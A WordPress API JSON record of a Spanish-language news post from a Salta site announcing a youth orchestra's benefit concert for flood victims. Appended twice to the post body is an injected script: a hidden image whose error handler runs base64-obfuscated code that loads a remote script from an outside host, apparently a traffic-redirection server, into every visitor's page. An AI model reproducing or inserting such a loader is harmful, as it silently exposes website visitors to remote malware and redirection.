{"id":5148,"date":"2025-05-14T11:22:59","date_gmt":"2025-05-14T14:22:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5148"},"modified":"2025-08-13T23:33:46","modified_gmt":"2025-08-14T02:33:46","slug":"la-orquesta-sinfonica-infantil-y-juvenil-presenta-musica-solidaria","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5148","title":{"rendered":"La Orquesta Sinf\u00f3nica Infantil y Juvenil presenta \u201cM\u00fasica Solidaria\u201d"},"content":{"rendered":"\n<p><strong><em>Una noche de solidaridad y arte se vivir\u00e1 en el Teatro Provincial esta noche a las 20:30.<\/em><\/strong><\/p>\n\n\n\n<p>La Orquesta Sinf\u00f3nica Infantil y Juvenil de Salta presentar\u00e1 un concierto especial llamado \u201cM\u00fasica Solidaria\u201d este&nbsp;mi\u00e9rcoles 14 de mayo a las 20:30 en el Teatro Provincial \u201cJuan Carlos Saravia\u201d. El objetivo del evento es colaborar con las comunidades del norte provincial que resultaron afectadas por las recientes crecidas de los r\u00edos Bermejo y Pilcomayo, que provocaron graves inundaciones.<\/p>\n\n\n\n<p>La propuesta art\u00edstica reunir\u00e1 a j\u00f3venes int\u00e9rpretes comprometidos con su entorno social, en una velada donde la m\u00fasica se convertir\u00e1 en herramienta de ayuda. Acompa\u00f1ar\u00e1n a la orquesta el Coro Cantares, as\u00ed como las bandas Qimera y Sekka, ofreciendo un repertorio variado que conjuga talento, energ\u00eda y sensibilidad social.<\/p>\n\n\n\n<p>Las entradas ya pueden adquirirse a trav\u00e9s del sitio&nbsp;www.saltaticket.gob.ar&nbsp;y tambi\u00e9n en la boleter\u00eda del teatro. Todo lo recaudado ser\u00e1 destinado \u00edntegramente a colaborar con las familias damnificadas. Ser\u00e1 una noche donde la empat\u00eda se expresa en acordes, y el arte se transforma en un gesto concreto de solidaridad hacia quienes m\u00e1s lo necesitan.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Una noche de solidaridad y arte se vivir\u00e1 en el Teatro Provincial esta noche a las 20:30. La Orquesta Sinf\u00f3nica Infantil y Juvenil de Salta presentar\u00e1 un concierto especial llamado \u201cM\u00fasica Solidaria\u201d este&nbsp;mi\u00e9rcoles 14 de mayo a las 20:30 en el Teatro Provincial \u201cJuan Carlos Saravia\u201d. El objetivo del evento es colaborar con las comunidades [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5149,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-5148","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5148"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5148"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5148\/revisions"}],"predecessor-version":[{"id":6495,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5148\/revisions\/6495"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5149"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5148"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5148"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5148"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}